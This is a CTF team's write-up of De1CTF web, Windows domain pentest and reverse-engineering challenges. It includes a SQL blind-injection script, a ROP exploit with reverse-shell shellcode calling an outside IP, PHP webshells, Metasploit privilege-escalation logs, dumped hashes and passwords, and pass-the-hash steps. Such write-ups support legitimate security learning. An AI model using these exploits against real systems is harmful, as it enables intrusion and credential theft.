De1CTF Writeup By V&N
2021-02-08 白帽100安全攻防實驗室文件內容不能包含
perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet對文件名也有限制
傳.htaccess
AddType application/x-httpd-p\hp .wuwu解析 拿flag
Mixture① SQL Order by 盲注任意用戶名密碼進入(視為Guest登錄),在用戶查詢界面根據html注釋裡的orderby注釋,推測後端語句
select ... from ... where ... order by {INPUT}(坑點:過濾了desc,給數字沒有可見的效果,可以給limit 1,1 preocedure analyse(1)但是沒有意義)
過濾if,使用and(elt(子語句,HEAVY_QUERY))進行盲注
#coding:utf8#部分盲註腳本url = "http://134.175.185.244/member.php?orderby="phpsessid = "lpspvlk3jbn0iojfg3ul52q26o"proxies={"http":"http://localhost:4476"}import requestsimport tracebackimport urllib3
def get(clause): a= requests.get(url + clause,headers={"Cookie":"PHPSESSID="+phpsessid},timeout=3,proxies=proxies); assert a.status_code == 200; assert "hacker" not in a.text; return a;def hexe(data): result = "0x" for i in data: result += "%02x" % ord(i) return resultresult = ""current = 0x20while 1: try: print(current); t = get("and(elt((select database()<" + hexe(result + chr(current)) + "),benchmark(100000,sha(1))))"); #print(t.text) #exit(0) current+=1; if current > 128: raise RuntimeError(); except KeyboardInterrupt as e: exit(0); except Exception as e: result += chr(current-1); print(result); current = 0x20; while 1: try: get("and(1)"); break; except KeyboardInterrupt as e: exit(0); except Exception as e: pass;#database()=test;注出admin密碼 goodlucktoyou
② Webpwn使用admin登錄後可以訪問包含任意文件頁面和phpinfo頁面,包含包含任意文件頁面的源碼發現使用了自定義Minclude方法,包含php.ini找到自定義的so插件路徑,包含出來得到minclude.so
同時為了pwn也包含出來其他的so libphp7.so libc-2.28.so
使用對應版本的php可以正常加載minclude.so為插件,並且使用minclude方法
minclude方法中存在棧溢出(web手並不會pwn方法有花指令,ida不能f5,大概可以看出是memcpy造成的棧溢出)((114webpwn全能 114txdy))
cyclic測出來溢出到rip是136字符後
這裡思考了一天怎麼去繞過pie,因為所有apache2進程都是fork出來的,fork出來的進程的pie和aslr一樣,在一個進程裡包含/proc/self/maps就能得到所有進程的pie偏移
#coding:utf8#先讀mmap讀到pie
from pwn import *import requestsimport remode = "remote"re4libc = re.compile(r"^(.*)-.* r--p 00000000.* /lib/x86_64-linux-gnu/libc-2\.28\.so$", flags = re.MULTILINE);re4stack = re.compile(r"^(.*)-(.*) rw-p 00000000.* \[stack\]$", flags = re.MULTILINE);re4pid = re.compile(r"^Pid: ([0-9].*)$", flags = re.MULTILINE);re4php = re.compile(r"^(.*)-.* r--p 00000000.* /usr/lib/apache2/modules/libphp7\.so$", flags = re.MULTILINE);
PHPSESSID = "v1euqioi1ej46c91ded46bucrh"
if mode == "remote": pop_rdi_ret = 0x000000023a5f pop_rsi_ret = 0x00002440e pop_rdx_ret = 0x000106725 jmp_rsp = 0x0000006cabd jmp_rsp_in_php = 0x0000000000016706d # jmp rsp #libc裡的jmp rsp好像不能用 libc = ELF("libc-2.28.so")else: pop_rdi_ret = 0x00002658e pop_rsi_ret = 0x00000026aa9 pop_rdx_ret = 0x0000107545 jmp_rsp = 0x00010753d #fake 2.29裡沒有jmp rsp可用 #自己在gdb裡跳一下 set $rip=$rsp libc = ELF("libc-2.29.so")
ip = p32(839847530) # api.chara.pub [106.14.15.50]port = '\x15\xb5' #5557shellcode = ""shellcode = "\xeb^" + '\x90'*96 #跳過汙染 #還必須跳的夠遠,別問我為什麼,本機跳24就行#彈shell #exploitdb shellcodes 40139.cshellcode += "\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\xb0\x29\x40\xb7\x02\x40\xb6\x01\x0f\x05\x48\x89\xc7\x6a\x02\x66\xc7\x44\x24\x02"+port+"\xc7\x44\x24\x04"+ip+"\xb0\x2a\x48\x89\xe6\xb2\x10\x0f\x05\x6a\x03\x5e\x48\xff\xce\xb0\x21\x0f\x05\x75\xf7\x48\x31\xf6\x48\xf7\xe6\x56\x48\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05"
def dopwn(): if mode == "remote": #給爺爬pie data = requests.post("http://49.51.251.99/select.php",data={"search":"/proc/self/status"},headers={"Cookie":"PHPSESSID="+PHPSESSID},proxies={"http":"http://172.16.81.95:4476"}); data = data.text; print(re.findall(re4pid,data)[0].decode()) data = requests.post("http://49.51.251.99/select.php",data={"search":"/proc/self/maps"},headers={"Cookie":"PHPSESSID="+PHPSESSID},proxies={"http":"http://172.16.81.95:4476"}); data = data.text; libcp = re.findall(re4libc,data); stackp = re.findall(re4stack,data); phpp = re.findall(re4php,data); phpbase = int(phpp[0].decode(),16); libcbase = int(libcp[0].decode(),16); stackbase = int(stackp[0][0].decode(),16); stacklength = int(stackp[0][1].decode(),16) - stackbase; print("%s %s %s %s"%(hex(libcbase),hex(stackbase),hex(stacklength),hex(phpbase))) else: #gdb會關閉aslr和pie libcbase = 0x000007ffff763e000 stackbase = 0x00007ffffffde000 stacklength = 0x00007ffffffff000 - stackbase print "b *"+hex(pop_rdi_ret + libcbase) print "b *"+hex(jmp_rsp + libcbase) def p(addr): return p64(addr + libcbase) payload = 'a'*(136) #payload += p(pop_rdi_ret)+p64(100)+p(libc.sym['sleep']) #mprotect(stackbase,stacklength,7) payload += p(pop_rdi_ret) + p64(stackbase) + p(pop_rsi_ret)+p64(stacklength)+p(pop_rdx_ret)+p64(7)+p(libc.sym['mprotect']) payload += p64(phpbase + jmp_rsp_in_php) payload += shellcode
if mode is not "remote": import base64 print("minclude(base64_decode('"+base64.b64encode(payload)+"'));") exit(0);
try: requests.post("http://49.51.251.99/select.php",data={"search":payload},headers={"Cookie":"PHPSESSID="+PHPSESSID},proxies={"http":"http://172.16.81.95:4476"},timeout=0.1); except: pass
while True: dopwn();③ 數學題彈shell以後,執行/readflag需要做數學題,還必須要很快
/readflagSolve the easy challenge first(((((-753950)+(-991931))-(661941))+(90651))-(713973))input your answer: -3031144ok! here is your flag!!from pwn import *bind_port = 5557#context.log_level="debug"def main(): global bind_port sha_server = listen(bind_port) sh = sha_server.wait_for_connection() while 1: sh.sendline("/readflag"); t = sh.recvuntil("Solve the easy challenge first\n"); print(t) path = sh.recvuntil("\ninput your answer",drop=1); print(path) sh.sendline(str(eval(path))); #sh.interactive();if __name__ == "__main__": main()Hard_Pentest 1Php7.2.29 文件上傳文件名不能包含
..\
文件內容內容不能包含
數字字母;~^`&|\
無字母數字WebShell,用PHP短標籤繞過 ; 過濾:大小寫後綴繞過檢測
<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?><?=$___=$_?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$____='_'?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$_=$$____?><?=$_[__]($_[_])?>__=system&_=echo ^<?php eval($_REQUEST[a]); > a.php拿到shell以後發現是域滲透,可以上傳一個msf馬給自己彈meterpreter方便操作
查看系統信息發現192.168.0.11(當前主機)是域內主機,192.168.0.12是域控制器
net use \\192.168.0.12\IPC$ net view \\192.168.0.12
可以發現存在Hint共享,裡面有一個壓縮包 flag1_and_flag2hint.zip
下載下來發現需要密碼,net user /domain 發現有HintZip_Pass用戶
利用域控GPP漏洞讀取HintZip_Pass用戶的密碼
dir /s /a \\192.168.0.12\SYSVOL\*.xml成功讀到HintZip_Pass的cpassword,他是經過AES加密
而微軟給出了私鑰 https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN
使用gpp-decrypt把拿到的cpassword解密,得到用戶密碼,即壓縮包密碼 zL1PpP@sSwO3d
Hard_Pentest 2
在第一天,伺服器沒有修復ms16-075,可以通過ms16-075提權,利用mimikatz(kiwi),拿到一個DM$用戶的帳號密碼
msf5 exploit(windows/local/ms16_075_reflection_juicy) > set CLSID {8BC3F05E-D86B-11D0-A075-00C0 CLSID => {8BC3F05E-D86B-11D0-A075-00C04FB68820}msf5 exploit(windows/local/ms16_075_reflection_juicy) > set payload windows/x64/meterpreter/rev payload => windows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/local/ms16_075_reflection_juicy) > show optionsModule options (exploit/windows/local/ms16_075_reflection_juicy): Name Current Setting Required Description ---- --- - CLSID {8BC3F05E-D86B-11D0-A075-00C04FB68820} yes Set CLSID value of the DCOM to trigger SESSION yes The session to run this module on.Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --- - EXITFUNC none yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen portmsf5 exploit(windows/local/ms16_075_reflection_juicy) > set lhost api.chara.pubelhost => api.chara.pubmsf5 exploit(windows/local/ms16_075_reflection_juicy) > sessions -lActive sessions=============== Id Name Type Information Connection -- ---- ---- - 10 meterpreter x64/windows DE1CTF2020\web @ DM 172.16.81.241:4444 -> 172.16.81.95:24953 (192.168.0.11)msf5 exploit(windows/local/ms16_075_reflection_juicy) > set session 10session => 10msf5 exploit(windows/local/ms16_075_reflection_juicy) > exploit
[-] Handler failed to bind to 106.14.15.50:4444:- -[*] Started reverse TCP handler on 0.0.0.0:4444 [*] Launching notepad to host the exploit...[+] Process 4676 launched.[*] Reflectively injecting the exploit DLL into 4676...[*] Injecting exploit into 4676...[*] Exploit injected. Injecting exploit configuration into 4676...[*] Configuration injected. Executing exploit...[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.[*] Sending stage (206403 bytes) to 172.16.81.95[*] Meterpreter session 11 opened (172.16.81.241:4444 -> 172.16.81.95:25161) at 2020-05-02 19:12:41 +0800
meterpreter > whoami[-] Unknown command: whoami.meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > creds_all[+] Running as SYSTEM[*] Retrieving all credentialsmsv credentials===============
Username Domain NTLM SHA1--- - ---- ----Administrator dc.de1ctf2020.lab 31d6cfe0d16ae931b73c59d7e0c089c0 da39a3ee5e6b4b0d3255bfef95601890afd80709Administrator . 31d6cfe0d16ae931b73c59d7e0c089c0 da39a3ee5e6b4b0d3255bfef95601890afd80709Administrator DM 7f6859d858a45f5d892834e3eb2985c7 c0df00e7fbd2ef14eee06fab363030d84b378c66Administrator DE1CTF2020 31d6cfe0d16ae931b73c59d7e0c089c0 da39a3ee5e6b4b0d3255bfef95601890afd80709DM$ DE1CTF2020 e59ecbef933e5210016c214cf296567c d68df34d74f67682c3094b0177f6c857ccc20346user domain 36aa83bdcab3c9fdaf321ca42a31c3fc 3e3e2c4b66db6b3a06fe6c4cbd32853713e7cb70web DE1CTF2020 789564fb409a50f524bfa6e31d3429d4 048b2049fcb76173804257ac4ad85d5e6d5cca34
kerberos credentials====================
Username Domain Password--- - ---(null) (null) (null)Administrator dc.de1ctf2020.lab (null)Administrator (null) (null)Administrator DM (null)Administrator DE1CTF2020 (null)DM$ De1CTF2020.lab _#DCJXiaF/gnV\M?pe*=fuF1CjZOk)]v&dOwvT=LU$>"2K!`@frT7q \0Mb#nmhSe9u1-h/m]!#Dba'F82#E.SUocp?a:y#[)=)Q`O#@<GrF]seu`r@skM:>dm$ DE1CTF2020.LAB (null)user domain passweb DE1CTF2020.LAB (null)web DE1CTF2020.LAB Deee1CTF_2020第二天修復了ms16-075,但是沒有修改DM$用戶的密碼,而且很奇怪的使用DM$用戶可以 在0.11psexec.py提權到SYSTEM(賽後依然可以),但不能提權0.12(只成功了一次,見後文)
#需要設置好msfconsole的socks4a和autoroute,配置好proxychainsproxychains python psexec.py -hashes d68df34d74f67682c3094b0177f6c857ccc20346:e59ecbef933e5210016c214cf296567c De1CTF2020.lab/DM\$@192.168.0.11 cmd在SYSTEM用戶執行mimikatz,可以通過sekurlsa::logonpasswords得到De1ta用戶的密碼。
Authentication Id : 0 ; 17650521 (00000000:010d5359)Session : Interactive from 0User Name : De1taDomain : DE1CTF2020Logon Server : DCLogon Time : 5/3/2020 11:06:41 AMSID : S-1-5-21-1806179181-549835139-1294087714-1106 msv : [00000003] Primary * Username : De1ta * Domain : DE1CTF2020 * NTLM : b03094996601324646ac223bf30d0d07 * SHA1 : 5e9fa03242f7fbd86c841f99177e64fbe91515c0 [00010000] CredentialKeys * NTLM : b03094996601324646ac223bf30d0d07 * SHA1 : 5e9fa03242f7fbd86c841f99177e64fbe91515c0 tspkg : wdigest : * Username : De1ta * Domain : DE1CTF2020 * Password : 3f23ea12 kerberos : * Username : De1ta * Domain : DE1CTF2020.LAB * Password : (null) ssp : credman :利用DM$用戶的用戶名+密碼或hash,對0.12使用psexec.py,自動提權到SYSTEM,得到flag
(此操作僅成功了一次,之前和之後均無法復現,但是官方解法是De1ta用戶提權到域管理員,應該沒人拿DM$用戶提權的,所以不理解具體發生了什麼)
type c:\Users\Administrator\Desktop\flag.txt
Calc
經過測試是 Spring,此處是 Spel 且有關鍵詞過濾,對於關鍵詞過濾部分關鍵詞可使用大小寫繞過,例如 nEw 即可替代 new ,以下先在本地測試。在·
可以正確讀取
打上去讀取 /flag,成功~
ReverseParser
這個題拿過來,因為自己做完了嗎,大概寫寫 實在不愛動態調試了,稍微寫寫
主要的函數部分,我們進去分析
經過多次調試發現這裡是主要的函數
這裡是個rc4的流程
des
aes
經過我反覆的試驗:這裡進行了一個+ _的判斷 走的是 + aes _des
那麼說,後面有一個判斷的字符長度 0x40 我們知道是64
那麼我們進行分析,在64 後 我們進行aes 是有padding的,直接貼數據了0B827A9E002E076DE2D84CACB123BC1EB08EBEC1A454E0F550C65D37C58C7DAF2D4827342D3B13D9730F25C17689198B10101010101010101010101010101010
我們 des 和 aes的密鑰也都是padding 的 一個 是補02 一個補的是0A
那麼說 我們去掉了padding後,變成了48位的數據,那麼我們假設了一下,32 16 = 48
後16是des,所以我直接去試了一下,這個位置試了很多次,都可以通過padding來分辨是多少位,所以後面的16位拿出來,去解一下 des cbc模式
2D4827342D3B13D9730F25C17689198B 密鑰 iv De1CTF02020B827A9E002E076DE2D84CACB123BC1EB08EBEC1A454E0F550C65D37C58C7DAF 這裡那麼就是一個aes 密鑰 iv De1CTF0A0A(10個0A一共),(網上的直接解的直接給你padding過了)91983da9b1 3a31ef0472b502073b68ddbddb3cc17d
我這裡分成了5 和 16 那麼我分別去解一下 發現91983da9b1 直接可以解出來RC4,也滿足了我當初的猜想,最開始的一段是進行rc4的,然後進行的別的操作前面的他是不變的
那麼剩下的3a31ef0472b502073b68ddbddb3cc17d 去解一下des,直接可以解出來,再解rc4就是答案了
通過我們的推理直接用 + _ 把我們所有的5段連結起來 就是flag 用De1CTF{} 包圍即可
FlwIDA7.0以上的版本會直接奔潰,原因未知
但是IDA6.8可以打開
打開題目以後找main找了半天。
ctrl+f12查找字符串交叉引用,通過『pause'指令找到main函數
可見數量和樣式繁多的花指令。
稍微去掉一點花指令之後,在main函數中找到sub_415620,這是虛擬機入口switch表中的default有一個ret 0xff,去掉該指令後,ida 7.0+可以正常分析了.
data段中的·unk_421048是虛擬機的指令(代碼)
看起來似乎是一個基於隊列的虛擬機
有點像虎符的那個棧虛擬機
翻譯虛擬機指令:
0x3a:讀入字符串並放入某個數組中
0x14,0x??:將0x??加入隊列中等待
0x34,0xff:如果隊首的兩個數據之差不為0,則返回false
0x41:之前數組中的數據被加入到隊列中等待
0x20,0x??:隊列頭部的一個字節被放入數組m3[??]的位置0x2a,0x??:m3[??]處的一個字節被加入隊列等待
0x33:將隊列頭部的兩個字節相加,結果被放入隊列等待
0x2b:出列一個字節a1,將m3[a1]處的字加入隊列等待
0x30: 左移WORD型變量tmp,然後加上隊列頭部的一個字節
0x35:將隊列頭部的兩字節相乘(結果對0x100取模),結果加入隊列等待
0x2c:隊列出隊一個字節a1,然後把m3[a1]處的值放入隊列尾部等待
0x40,0x??:隊列出隊一個字節a1,如果a1!=0,則跳轉到0x??的相對位移處
0x31,0x??:tmp /= 0x??,然後把tmp %0x??的結果放入隊列頭部等待
0xab:返回1
然後手撕機器碼,大概知道程序幹了些什麼
1.讀取用戶輸入,並判斷用戶輸入的長度。如果長度不是28,則返回false
2.將用戶輸入放入隊列
3.從隊列中取出用戶輸入,並放入內存區域m3
4.檢測flag的外包De1CTF{}
5.flag內的20個字節,每兩個為一組進行換表base58。按照base58的規則,2個字節被編碼為3個字節(吐槽一句,一開始搜索字符串的時候看到table是『=』做結尾,還以為是base64)
6.base58之後的數據,每3個字節為一組,相互進行加,減和異或
7.memcmp
算法不難,從memcmp那堆字節碼裡頭提取出加密過的flag,逆回去就行了
mic_ticktock拿到題目後,直接去看一下流程,看不懂,這是個啥
不過可以大概看出來這個是個go逆向,直接用插件,恢復的很好
大部分都恢復了,我們可以知道這個是個webserver,那麼webserver可以考慮到路由表,也看到了這裡有github router,直接想一下router的問題,那麼根據路由表來去看函數,我們調試一下然後看看功能都是什麼,我大概試了兩個就找了輸入,運氣比較好?也許
0000000000692730 webproxy的處理函數
0000000000693580 ticktock的
所以我們ticktock直接在本地測試一下,發現可以獲取我們輸入的字符
直接在693580下斷點,進行調試分析,根據恢復的表
直接看看關鍵點加密這裡,不難分析出這是一個SM4 CFB模式
經過調試發現
這個東西,我們去不到這裡,這裡進行了分析,那麼我們就是一個在輸入我們在瀏覽器看到的還有一個是進行了,比較
直接可以看到,這裡有個54的數據,那麼這裡卡了一下看了文獻CFB模式,54可以的,因為消息無需進行填充
分析完直接解密
# coding=utf-8import requestsimport base64s = "Here is a FLAG: De1CTF{t1Ck-t0ck_Tlck-1ocK_MC2O20_:)SM4}"kk = " 0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{|}~()_[\]^`!\"$%'*+,-./;<=>?#:"flag = [0xA4,0xA3,0x04,0xB9,0x1E,0xF1,0x96,0xC6,0x0A,0x26,0x4D,0xE9,0xAF,0xFD,0xB1,0xFF,0x06,0xEE,0xE5,0xCF,0x6B,0x2E,0x0C,0x02,0x17,0x6A,0x97,0xB7,0x95,0xAC,0xB8,0x11,0x1A,0x8F,0x13,0x83,0xE5,0xAF,0x67,0xC9,0x6A,0x26,0x99,0x2B,0x1C,0xAD,0x3F,0x41,0xDF,0xAA,0x36,0x36,0x08,0xA2,0x04,0x9D]for i in flag[len(s):]: for j in kk: url = "http://127.0.0.1/ticktock?text=" + s + j response = requests.get(url) content = response.content # print content res = content.replace("TickTock: ","")
if i == ord(base64.b64decode(res)[-1] ): s = s + j print j,i,ord(base64.b64decode(res)[-1] ) breakprint s小精靈文件拿到手以後發現ida沒法直接解析,elf頭有問題
readelf一看,好多變量被改的亂七八糟的。不過我們只需要把標記大端序小端序的哪個變量改成0x01就行。
修改以後,保存文件,可以用ida7.0打開並解析。發現沒有符號表,這題目tnnd是手擼的彙編去除花指令:
然後我們可以看到完整的程序流程圖。
不難發現,程序由44組相同的算法構成。翻譯其中一組算法為python代碼如下:
reg = 0usr_input = [ord('a')]*44#用戶輸入,隨便整data = ["設定好的十六進位數"]*44#每組data44個字節,一共44組for d in range(44): usr = usr_input[d] t_data = data[d] for s in range(8): if t_data & 1 != 0: reg = reg ^ usr if usr & 0x80 != 0: usr = (usr<<1)&0xff usr = usr^0x39 else: usr = (usr<<1)&0xff t_data = t_data>>1
#和data一樣,reg == 0x?? 也有44組if reg == 0xC8: print("Success!")else: print("fail")然後我去優化了一下整個的程序,現在直接看下
直接可以看到邏輯,v2就是res,v0是我們的輸入
分析一下,這裡使用了個GF(2^8)的一個算法,我們把數據搞出來
數據見:https://paste.ubuntu.com/p/tFnmskgSd7/
參考文獻:https://blog.csdn.net/hunyxv/article/details/89033227http://www.cut-the-knot.org/Curriculum/Algebra/PeasantMultiplication.shtml
Peasant Multiplication算法
這裡的0x39滿足的一個 不可約多項式,所以這裡可以想到密碼學中的環的概念和有限域的概念reg初始為0,然後經過一輪後是會有一個值的,然後這個值會帶入到第二輪,一直44輪,得到一個reg和results對比,那麼說這是個方程組
0 1 x x + 1 x^2 x^2 + 1 x^2 + x x^2 + x + 1 x^3 x^3 + 1 x^3 + x x^3 + x + 1 x^3 + x^2 x^3 + x^2 + 1 x^3 + x^2 + x x^3 + x^2 + x + 1 x^4 x^4 + 1 x^4 + x x^4 + x + 1 x^4 + x^2 x^4 + x^2 + 1 x^4 + x^2 + x x^4 + x^2 + x + 1 x^4 + x^3 x^4 + x^3 + 1 x^4 + x^3 + x x^4 + x^3 + x + 1 x^4 + x^3 + x^2 x^4 + x^3 + x^2 + 1 x^4 + x^3 + x^2 + x x^4 + x^3 + x^2 + x + 1 x^5 x^5 + 1 x^5 + x x^5 + x + 1 x^5 + x^2 x^5 + x^2 + 1 x^5 + x^2 + x x^5 + x^2 + x + 1 x^5 + x^3 x^5 + x^3 + 1 x^5 + x^3 + x x^5 + x^3 + x + 1 x^5 + x^3 + x^2 x^5 + x^3 + x^2 + 1 x^5 + x^3 + x^2 + x x^5 + x^3 + x^2 + x + 1 x^5 + x^4 x^5 + x^4 + 1 x^5 + x^4 + x x^5 + x^4 + x + 1 x^5 + x^4 + x^2 x^5 + x^4 + x^2 + 1 x^5 + x^4 + x^2 + x x^5 + x^4 + x^2 + x + 1 x^5 + x^4 + x^3 x^5 + x^4 + x^3 + 1 x^5 + x^4 + x^3 + x x^5 + x^4 + x^3 + x + 1 x^5 + x^4 + x^3 + x^2 x^5 + x^4 + x^3 + x^2 + 1 x^5 + x^4 + x^3 + x^2 + x x^5 + x^4 + x^3 + x^2 + x + 1 x^6 x^6 + 1 x^6 + x x^6 + x + 1 x^6 + x^2 x^6 + x^2 + 1 x^6 + x^2 + x x^6 + x^2 + x + 1 x^6 + x^3 x^6 + x^3 + 1 x^6 + x^3 + xx^6 + x^3 + x + 1 x^6 + x^3 + x^2 x^6 + x^3 + x^2 + 1 x^6 + x^3 + x^2 + x x^6 + x^3 + x^2 + x + 1 x^6 + x^4 x^6 + x^4 + 1 x^6 + x^4 + x x^6 + x^4 + x + 1 x^6 + x^4 + x^2 x^6 + x^4 + x^2 + 1 x^6 + x^4 + x^2 + x x^6 + x^4 + x^2 + x + 1 x^6 + x^4 + x^3 x^6 + x^4 + x^3 + 1 x^6 + x^4 + x^3 + x x^6 + x^4 + x^3 + x + 1 x^6 + x^4 + x^3 + x^2 x^6 + x^4 + x^3 + x^2 + 1 x^6 + x^4 + x^3 + x^2 + x x^6 + x^4 + x^3 + x^2 + x + 1 x^6 + x^5 x^6 + x^5 + 1 x^6 + x^5 + x x^6 + x^5 + x + 1 x^6 + x^5 + x^2 x^6 + x^5 + x^2 + 1 x^6 + x^5 + x^2 + x x^6 + x^5 + x^2 + x + 1 x^6 + x^5 + x^3 x^6 + x^5 + x^3 + 1 x^6 + x^5 + x^3 + x x^6 + x^5 + x^3 + x + 1 x^6 + x^5 + x^3 + x^2 x^6 + x^5 + x^3 + x^2 + 1 x^6 + x^5 + x^3 + x^2 + x x^6 + x^5 + x^3 + x^2 + x + 1 x^6 + x^5 + x^4 x^6 + x^5 + x^4 + 1 x^6 + x^5 + x^4 + x x^6 + x^5 + x^4 + x + 1 x^6 + x^5 + x^4 + x^2 x^6 + x^5 + x^4 + x^2 + 1 x^6 + x^5 + x^4 + x^2 + x x^6 + x^5 + x^4 + x^2 + x + 1 x^6 + x^5 + x^4 + x^3 x^6 + x^5 + x^4 + x^3 + 1 x^6 + x^5 + x^4 + x^3 + x x^6 + x^5 + x^4 + x^3 + x + 1 x^6 + x^5 + x^4 + x^3 + x^2 x^6 + x^5 + x^4 + x^3 + x^2 + 1 x^6 + x^5 + x^4 + x^3 + x^2 + x x^6 + x^5 + x^4 + x^3 + x^2 + x + 1 x^7 x^7 + 1 x^7 + x x^7 + x + 1 x^7 + x^2 x^7 + x^2 + 1 x^7 + x^2 + x x^7 + x^2 + x + 1 x^7 + x^3 x^7 + x^3 + 1 x^7 + x^3 + x x^7 + x^3 + x + 1 x^7 + x^3 + x^2 x^7 + x^3 + x^2 + 1 x^7 + x^3 + x^2 + x x^7 + x^3 + x^2 + x + 1 x^7 + x^4 x^7 + x^4 + 1 x^7 + x^4 + x x^7 + x^4 + x + 1 x^7 + x^4 + x^2 x^7 + x^4 + x^2 + 1 x^7 + x^4 + x^2 + xx^7 + x^4 + x^2 + x + 1 x^7 + x^4 + x^3 x^7 + x^4 + x^3 + 1 x^7 + x^4 + x^3 + x x^7 + x^4 + x^3 + x + 1 x^7 + x^4 + x^3 + x^2 x^7 + x^4 + x^3 + x^2 + 1 x^7 + x^4 + x^3 + x^2 + x x^7 + x^4 + x^3 + x^2 + x + 1 x^7 + x^5 x^7 + x^5 + 1 x^7 + x^5 + x x^7 + x^5 + x + 1 x^7 + x^5 + x^2 x^7 + x^5 + x^2 + 1 x^7 + x^5 + x^2 + x x^7 + x^5 + x^2 + x + 1 x^7 + x^5 + x^3 x^7 + x^5 + x^3 + 1 x^7 + x^5 + x^3 + x x^7 + x^5 + x^3 + x + 1 x^7 + x^5 + x^3 + x^2 x^7 + x^5 + x^3 + x^2 + 1 x^7 + x^5 + x^3 + x^2 + x x^7 + x^5 + x^3 + x^2 + x + 1 x^7 + x^5 + x^4 x^7 + x^5 + x^4 + 1 x^7 + x^5 + x^4 + x x^7 + x^5 + x^4 + x + 1 x^7 + x^5 + x^4 + x^2 x^7 + x^5 + x^4 + x^2 + 1 x^7 + x^5 + x^4 + x^2 + x x^7 + x^5 + x^4 + x^2 + x + 1 x^7 + x^5 + x^4 + x^3 x^7 + x^5 + x^4 + x^3 + 1 x^7 + x^5 + x^4 + x^3 + x x^7 + x^5 + x^4 + x^3 + x + 1 x^7 + x^5 + x^4 + x^3 + x^2 x^7 + x^5 + x^4 + x^3 + x^2 + 1 x^7 + x^5 + x^4 + x^3 + x^2 + x x^7 + x^5 + x^4 + x^3 + x^2 + x + 1 x^7 + x^6 x^7 + x^6 + 1 x^7 + x^6 + x x^7 + x^6 + x + 1 x^7 + x^6 + x^2 x^7 + x^6 + x^2 + 1 x^7 + x^6 + x^2 + x x^7 + x^6 + x^2 + x + 1 x^7 + x^6 + x^3 x^7 + x^6 + x^3 + 1 x^7 + x^6 + x^3 + x x^7 + x^6 + x^3 + x + 1 x^7 + x^6 + x^3 + x^2 x^7 + x^6 + x^3 + x^2 + 1 x^7 + x^6 + x^3 + x^2 + x x^7 + x^6 + x^3 + x^2 + x + 1 x^7 + x^6 + x^4 x^7 + x^6 + x^4 + 1 x^7 + x^6 + x^4 + x x^7 + x^6 + x^4 + x + 1 x^7 + x^6 + x^4 + x^2 x^7 + x^6 + x^4 + x^2 + 1 x^7 + x^6 + x^4 + x^2 + x x^7 + x^6 + x^4 + x^2 + x + 1 x^7 + x^6 + x^4 + x^3 x^7 + x^6 + x^4 + x^3 + 1 x^7 + x^6 + x^4 + x^3 + x x^7 + x^6 + x^4 + x^3 + x + 1 x^7 + x^6 + x^4 + x^3 + x^2 x^7 + x^6 + x^4 + x^3 + x^2 + 1 x^7 + x^6 + x^4 + x^3 + x^2 + x x^7 + x^6 + x^4 + x^3 + x^2 + x + 1 x^7 + x^6 + x^5 x^7 + x^6 + x^5 + 1 x^7 + x^6 + x^5 + xx^7 + x^6 + x^5 + x + 1 x^7 + x^6 + x^5 + x^2 x^7 + x^6 + x^5 + x^2 + 1 x^7 + x^6 + x^5 + x^2 + x x^7 + x^6 + x^5 + x^2 + x + 1 x^7 + x^6 + x^5 + x^3 x^7 + x^6 + x^5 + x^3 + 1 x^7 + x^6 + x^5 + x^3 + x x^7 + x^6 + x^5 + x^3 + x + 1 x^7 + x^6 + x^5 + x^3 + x^2 x^7 + x^6 + x^5 + x^3 + x^2 + 1 x^7 + x^6 + x^5 + x^3 + x^2 + x x^7 + x^6 + x^5 + x^3 + x^2 + x + 1 x^7 + x^6 + x^5 + x^4 x^7 + x^6 + x^5 + x^4 + 1 x^7 + x^6 + x^5 + x^4 + x x^7 + 